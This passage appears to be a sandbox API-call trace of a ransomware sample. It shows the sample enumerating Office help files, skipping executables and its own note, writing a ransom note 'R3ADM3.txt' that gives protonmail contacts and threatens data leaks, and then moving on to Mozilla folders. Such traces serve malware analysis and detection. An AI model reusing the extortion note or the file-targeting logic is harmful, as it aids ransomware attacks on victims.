ftLastWriteTime.dwLowDateTime=0x26af670, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x16a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.OUTLOOK.DEV.14.1033.hxn", cAlternateFileName="MSOUTL~2.HXN")) returned 1 [0140.675] lstrcmpW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2=".") returned 1 [0140.675] lstrcmpW (lpString1="MS.OUTLOOK.DEV.14.1033.hxn", lpString2="..") returned 1 [0140.675] StrStrIW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.675] StrStrIW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.675] StrStrIW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.675] StrStrIW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.675] StrStrIW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.675] StrStrIW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.675] StrStrIW (lpFirst="MS.OUTLOOK.DEV.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.675] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.675] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.675] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.675] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd988 [0140.675] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.675] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.675] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.675] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedda10 [0140.675] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2628 [0140.675] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddb20 [0140.675] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedda10 | out: hHeap=0xea0000) returned 1 [0140.676] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd988 | out: hHeap=0xea0000) returned 1 [0140.676] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x158, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.14.1033.hxn", cAlternateFileName="MSPOWE~1.HXN")) returned 1 [0140.676] lstrcmpW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2=".") returned 1 [0140.676] lstrcmpW (lpString1="MS.POWERPNT.14.1033.hxn", lpString2="..") returned 1 [0140.676] StrStrIW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.676] StrStrIW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.676] StrStrIW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.676] StrStrIW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.676] StrStrIW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.676] StrStrIW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.676] StrStrIW (lpFirst="MS.POWERPNT.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.676] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.676] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.676] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.676] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.676] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.676] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.676] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.676] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.676] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2650 [0140.676] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeef68 [0140.677] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.677] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.677] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xf5fa06b0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf5fa06b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf5fec970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x170, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.POWERPNT.DEV.14.1033.hxn", cAlternateFileName="MSPOWE~2.HXN")) returned 1 [0140.677] lstrcmpW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2=".") returned 1 [0140.677] lstrcmpW (lpString1="MS.POWERPNT.DEV.14.1033.hxn", lpString2="..") returned 1 [0140.677] StrStrIW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.677] StrStrIW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.677] StrStrIW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.677] StrStrIW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.677] StrStrIW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.677] StrStrIW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.677] StrStrIW (lpFirst="MS.POWERPNT.DEV.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.677] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.677] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.677] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.677] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd988 [0140.677] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1698 | out: hHeap=0xea0000) returned 1 [0140.677] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.677] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.677] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedda10 [0140.677] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2678 [0140.677] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xeddba8 [0140.678] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedda10 | out: hHeap=0xea0000) returned 1 [0140.678] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd988 | out: hHeap=0xea0000) returned 1 [0140.678] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0xef377f10, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xef377f10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xef3ea330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x152, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.SETLANG.14.1033.hxn", cAlternateFileName="MSSETL~1.HXN")) returned 1 [0140.678] lstrcmpW (lpString1="MS.SETLANG.14.1033.hxn", lpString2=".") returned 1 [0140.678] lstrcmpW (lpString1="MS.SETLANG.14.1033.hxn", lpString2="..") returned 1 [0140.678] StrStrIW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.678] StrStrIW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.678] StrStrIW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.678] StrStrIW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.678] StrStrIW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.678] StrStrIW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.678] StrStrIW (lpFirst="MS.SETLANG.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.678] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.678] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.678] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.678] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.678] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.678] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.679] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.679] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.679] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef26a0 [0140.679] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeefe0 [0140.679] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.679] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.679] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x5269fec0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.14.1033.hxn", cAlternateFileName="MSVISI~1.HXN")) returned 1 [0140.679] lstrcmpW (lpString1="MS.VISIO.14.1033.hxn", lpString2=".") returned 1 [0140.679] lstrcmpW (lpString1="MS.VISIO.14.1033.hxn", lpString2="..") returned 1 [0140.679] StrStrIW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.679] StrStrIW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.679] StrStrIW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.679] StrStrIW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.679] StrStrIW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.679] StrStrIW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.679] StrStrIW (lpFirst="MS.VISIO.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.679] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.679] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.679] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.679] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.679] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef1650 | out: hHeap=0xea0000) returned 1 [0140.680] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xebcc48 | out: hHeap=0xea0000) returned 1 [0140.680] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee3f90 | out: hHeap=0xea0000) returned 1 [0140.680] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeeab8 [0140.680] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef26c8 [0140.680] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeef058 [0140.680] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeeab8 | out: hHeap=0xea0000) returned 1 [0140.680] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeeec20 | out: hHeap=0xea0000) returned 1 [0140.680] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2022, ftCreationTime.dwLowDateTime=0x523a6340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x523a6340, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x527122e0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x15e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MS.VISIO.DEV.14.1033.hxn", cAlternateFileName="MSVISI~3.HXN")) returned 1 [0140.680] lstrcmpW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2=".") returned 1 [0140.680] lstrcmpW (lpString1="MS.VISIO.DEV.14.1033.hxn", lpString2="..") returned 1 [0140.680] StrStrIW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.680] StrStrIW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.680] StrStrIW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.680] StrStrIW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.680] StrStrIW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.680] StrStrIW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.680] StrStrIW (lpFirst="MS.VISIO.DEV.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.680] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.680] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.681] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.701] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.702] StrStrIW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.702] StrStrIW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.702] StrStrIW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.702] StrStrIW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO.SHAPESHEET.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd988 [0140.703] StrStrIW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO_PRM.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.703] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.703] StrStrIW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.703] StrStrIW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.VISIO_STD.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.704] StrStrIW (lpFirst="MS.WINPROJ.DEV.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.704] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd988 [0140.705] StrStrIW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.705] StrStrIW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.705] StrStrIW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.705] StrStrIW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.705] StrStrIW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.705] StrStrIW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.705] StrStrIW (lpFirst="MS.WINWORD.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x30) returned 0xee3f90 [0140.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.705] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x70) returned 0xeeec20 [0140.706] StrStrIW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".UAKXC") returned 0x0 [0140.706] StrStrIW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".exe") returned 0x0 [0140.706] StrStrIW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".dll") returned 0x0 [0140.706] StrStrIW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".lnk") returned 0x0 [0140.706] StrStrIW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".sys") returned 0x0 [0140.706] StrStrIW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch=".msi") returned 0x0 [0140.706] StrStrIW (lpFirst="MS.WINWORD.DEV.14.1033.hxn", lpSrch="R3ADM3.txt") returned 0x0 [0140.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1698 [0140.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x80) returned 0xedd988 [0140.707] StrStrIW (lpFirst="nslist.hxl", lpSrch=".UAKXC") returned 0x0 [0140.707] StrStrIW (lpFirst="nslist.hxl", lpSrch=".exe") returned 0x0 [0140.707] StrStrIW (lpFirst="nslist.hxl", lpSrch=".dll") returned 0x0 [0140.707] StrStrIW (lpFirst="nslist.hxl", lpSrch=".lnk") returned 0x0 [0140.707] StrStrIW (lpFirst="nslist.hxl", lpSrch=".sys") returned 0x0 [0140.707] StrStrIW (lpFirst="nslist.hxl", lpSrch=".msi") returned 0x0 [0140.707] StrStrIW (lpFirst="nslist.hxl", lpSrch="R3ADM3.txt") returned 0x0 [0140.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x20) returned 0xef2808 [0140.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xebcc48 [0140.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x40) returned 0xef1650 [0140.707] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x0, Size=0x60) returned 0xeec3c0 [0140.707] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".UAKXC") returned 0x0 [0140.707] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".exe") returned 0x0 [0140.707] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".dll") returned 0x0 [0140.707] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".lnk") returned 0x0 [0140.707] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".sys") returned 0x0 [0140.707] StrStrIW (lpFirst="R3ADM3.txt", lpSrch=".msi") returned 0x0 [0140.707] StrStrIW (lpFirst="R3ADM3.txt", lpSrch="R3ADM3.txt") returned="R3ADM3.txt" [0140.707] FindNextFileW (in: hFindFile=0xecfbe0, lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x58fb68d0, ftCreationTime.dwHighDateTime=0x1d68245, ftLastAccessTime.dwLowDateTime=0x58fb68d0, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x58fb68d0, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, nFileSizeLow=0xe3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="R3ADM3.txt", cAlternateFileName="")) returned 0 [0140.765] lstrlenA (lpString="The network is LOCKED. Do not try to use other software. For decryption tool write HERE:\r\n\r\nguifullcharti1970@protonmail.com\r\nphrasitliter1981@protonmail.com\r\n\r\nIf you do not pay, we will publish private data on our news site. ") returned 227 [0140.765] WriteFile (in: hFile=0x6c4, lpBuffer=0x2825890*, nNumberOfBytesToWrite=0xe3, lpNumberOfBytesWritten=0x6fbfc38, lpOverlapped=0x0 | out: lpBuffer=0x2825890*, lpNumberOfBytesWritten=0x6fbfc38*=0xe3, lpOverlapped=0x0) returned 1 [0140.766] CloseHandle (hObject=0x6c4) returned 1 [0140.767] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xec2c60 | out: hHeap=0xea0000) returned 1 [0140.767] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xee4188 | out: hHeap=0xea0000) returned 1 [0140.767] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Mozilla\\*", lpFindFileData=0x6fbfd08 | out: lpFindFileData=0x6fbfd08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xaf8556a0, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x5910d530, ftLastAccessTime.dwHighDateTime=0x1d68245, ftLastWriteTime.dwLowDateTime=0x5910d530, ftLastWriteTime.dwHighDateTime=0x1d68245, nFileSizeHigh=0x0, 